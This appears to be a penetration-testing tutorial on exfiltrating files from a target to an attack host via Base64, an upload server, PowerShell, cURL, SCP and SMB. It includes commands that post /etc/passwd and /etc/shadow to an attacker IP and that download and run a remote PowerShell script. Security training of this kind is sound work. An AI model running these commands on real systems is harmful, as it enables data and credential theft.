Exfiltration is the process of transferring files from a target machine to an attack host. This can be useful for tasks like password cracking, data analysis, or collecting sensitive information.
Copy/Paste Base64
Windows
# Convert the contents of a file to a Base64-encoded string[Convert]::ToBase64String((Get-Content -Path "C:\Users\Public\exfil.txt" -Encoding byte))
Linux
# Convert the contents of a file to a Base64-encoded stringcat test.txt | base64 -w 0; echo
Uploadserver
The easiest way to exfiltrate files from the target machine is to set up our own HTTP server. We can use the Python3 uploadserver module for this.
There are two ways to start this server: using either HTTP or HTTPS (with a self-signed certificate).
HTTP
# Start HTTP server (Attacker machine)python3 -m uploadserver
HTTPS
# Create a self signed certificateopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'# Create a new directory (webserver should not host the certificate)mkdir https && cd https# Start HTTPS server (Attacker machine)sudo python3 -m uploadserver 443 --server-certificate ../server.pem
Uploading files with Powershell
For uploading files to our server using PowerShell, we can use the PSUpload.ps1 script on Windows.
Warning
If you are using HTTPS as the server, you need to run this first:
# Download the PSUpload.ps1 scriptIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')# Invoke the script to upload a fileInvoke-FileUpload -Uri https://$IP/upload -File C:\Users\Public\exfil.txt
Uploading files with cURL
For uploading files to our server on Linux, we can use the curl command.
# Upload a single filecurl -X POST https://$IP/upload -F '[email protected]' -k# Upload multiple filescurl -X POST https://$IP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' -k
SSH
The Secure Shell Protocol (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution.
SCP (secure copy) is a command-line utility that allows you to copy files and directories between two hosts securely.
# Upload file to targetscp test.txt root@$IP:/tmp/
SMB
The Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network.
For transferring files using SMB, we need to set up an SMB server on our attack machine, then copy or move the files between the attack and target machines.
# Create the SMB server (Attacker machine)sudo impacket-smbserver share -smb2support /tmp/smbshare# Mount the SMB server (Target machine)> net use n: \\$IP\share > copy C:\Users\Public\test.txt n:\
Newer versions of Windows block unauthenticated guest access to SMB. To bypass this, we can set up an SMB server with authentication and then mount it on the target machine.
# Create the SMB server with Authentication (Attacker machine)sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test# Mount the SMB server (Target machine)> net use n: \\$IP\share /user:test test > copy C:\Users\Public\test.txt n:\
The File Transfer Protocol (FTP) is a standard communication protocol used for transferring computer files between a server and a client on a network. It operates as a clear-text protocol, meaning that data is sent in an unencrypted format.